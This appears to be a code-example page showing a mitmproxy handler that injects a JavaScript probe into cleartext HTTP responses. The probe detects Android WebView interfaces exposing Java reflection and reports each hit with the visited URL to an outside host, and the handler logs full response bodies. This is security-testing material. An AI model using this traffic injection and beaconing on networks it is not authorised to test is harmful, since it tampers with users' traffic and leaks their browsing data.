本文整理汇总了 Python 中 Analyzer.Analyzer.handle_response 方法的典型用法代码示例。如果您正苦于以下问题:Python Analyzer.handle_response 方法的具体用法?Python Analyzer.handle_response 怎么用?Python Analyzer.handle_response 使用的例子?那么,这里精选的方法代码示例或许可以为您提供帮助。您也可以进一步了解该方法所在类 Analyzer.Analyzer 的用法示例。
在下文中一共展示了Analyzer.handle_response方法的1个代码示例,这些例子默认根据受欢迎程度排序。您可以为喜欢或者感觉有用的代码点赞,您的评价将有助于系统推荐出更棒的Python代码示例。
示例1: handle_response
# 需要导入模块: from Analyzer import Analyzer [as 别名]
# 或者: from Analyzer.Analyzer import handle_response [as 别名]
def handle_response(self, flow):
    """Add a WebView bridge probe to HTML and JavaScript responses seen by the proxy.

    For a flow whose scheme passes the ``endswith("http")`` test and whose
    Host header does not contain ``www.fundacionsadosky.org.ar``, a small
    JavaScript probe is built and added to the response body:

    * ``text/html`` bodies are parsed with lxml, a ``<script>`` element
      holding the probe is appended, and the tree is serialised back.
    * bodies whose content type contains ``javascript`` get the probe
      prepended as UTF-8 text.

    The probe walks the properties of ``top``, skips nulls and functions,
    and tries ``getClass().forName('java.lang.Runtime')`` on each; names for
    which that call does not throw are reported with a GET request to
    ``www.fundacionsadosky.org.ar`` together with the base64 of host + path.
    Every flow is then handed to ``Analyzer.handle_response``.

    This is Python 2 code (``print`` statements). It relies on names that
    are not part of this excerpt: ``base64``, ``lxml.html``, ``decoded``
    and ``Analyzer``.

    NOTE(review): the page this listing was taken from dropped all
    indentation. The nesting below is a reconstruction; check it against
    the original file, in particular the ``else`` arm in the HTML branch
    and the statements that follow it.

    NOTE(review): a report from the probe means page script delivered over
    cleartext HTTP could reach Java reflection through a bridged object.
    Remediation belongs in the app under test (HTTPS-only WebView content,
    targeting API level 17+ so that only ``@JavascriptInterface`` methods
    are exposed) -- confirm against that app's manifest and WebView setup.

    Args:
        flow: the proxied request/response pair; ``flow.request`` and
            ``flow.response`` are read, and ``flow.response.content`` may be
            replaced.
    """
    print "request path is %s " % flow.request.path
    # Only rewrite when the flow is eligible and is not the probe's own
    # report request (the report goes to the host excluded below).
    # The [0] index suggests header lookups return a list of values --
    # presumably the older mitmproxy header API; confirm for the version in use.
    requested_site = flow.request.headers["Host"][0]
    # "https" does not end with "http", so TLS flows are left untouched here.
    # The Host test is a substring match, not an exact comparison.
    if flow.request.scheme.endswith("http") and requested_site.find("www.fundacionsadosky.org.ar") == -1:
        # Identifies the page in the report; base64 of host + path.
        visited_url = base64.b64encode(requested_site + flow.request.path)
        # Probe text, taken from www.droidsec.org/tests/addjsif/
        script = '''vulnerable=[];for(i in top){el=top[i];if(el==null){continue};if(typeof(el)==='function'){continue}try{top[i].getClass().forName('java.lang.Runtime');vulnerable.push(i)}catch(e){}}if(vulnerable.length>0){var request=new XMLHttpRequest();request.open("GET","http://www.fundacionsadosky.org.ar/?vulnerable_javascript_injection=true&interface="+vulnerable.join()+"&url=''' + visited_url + '''",true);request.onreadystatechange=function(){};request.send()}'''
        # Two spellings of the header name are tried in turn.
        content_type = flow.response.headers.get("Content-Type")
        if not content_type:
            content_type = flow.response.headers.get("Content-type")
        if content_type and "text/html" in content_type[0]:
            with decoded(flow.response): # automatically decode gzipped responses.
                if flow.response.content:
                    try:
                        response = flow.response.content
                        # NOTE(review): writes the entire decoded body to stdout;
                        # intercepted bodies can carry credentials or session data,
                        # so logging only the length would be safer.
                        print "Response is "+response
                        root = lxml.html.fromstring(response)
                        if root.find('.//*') is not None:
                            print "TRIED MODIFYING /html " + requested_site+ flow.request.path
                            # Has child elements: pick the insertion point, <head> first.
                            append_in = root.find('.//head')
                            if append_in is None:
                                append_in = root.find('.//body')
                            # NOTE(review): this repeats the condition of the `if` above,
                            # so it can never run; the <script>-parent fallback named in
                            # the original comment ("head, body or script") is dead code.
                            elif append_in is None:
                                append_in = root.find('.//script').getparent()
                        # NOTE(review): attached here to the child-element test (a root
                        # without children receives the probe directly). If it belongs to
                        # the chain above instead, documents with a <head> would be routed
                        # to root -- confirm against the original file.
                        else:
                            append_in = root
                        # `script` is rebound from the probe text to an lxml element here.
                        script = lxml.html.fromstring('<script>' + script + '</script>')
                        if append_in is not None:
                            append_in.append(script)
                            flow.response.content = lxml.html.tostring(root)
                    # NOTE(review): a bare except reports every failure in the block
                    # above as a parse problem, including ones that are not; catching
                    # Exception and printing the error would make skips diagnosable.
                    except:
                        print "There was a problem parsing the html response, skip it"
        # mimetype may be application/javascript or text/javascript
        elif content_type and "javascript" in content_type[0]:
            with decoded(flow.response): # automatically decode gzipped responses.
                print "TRIED MODIFYING /javascript " + requested_site + flow.request.path
                # NOTE(review): the original comment here mentioned looking for library
                # .js or jQuery files, but no such filter is visible; every response
                # with a JavaScript content type gets the probe prepended.
                flow.response.content = script.encode("utf-8") + flow.response.content
    # Delegate to Analyzer's handler for every flow, rewritten or not
    # (placement at function level is part of the reconstruction -- confirm).
    Analyzer.handle_response(self,flow)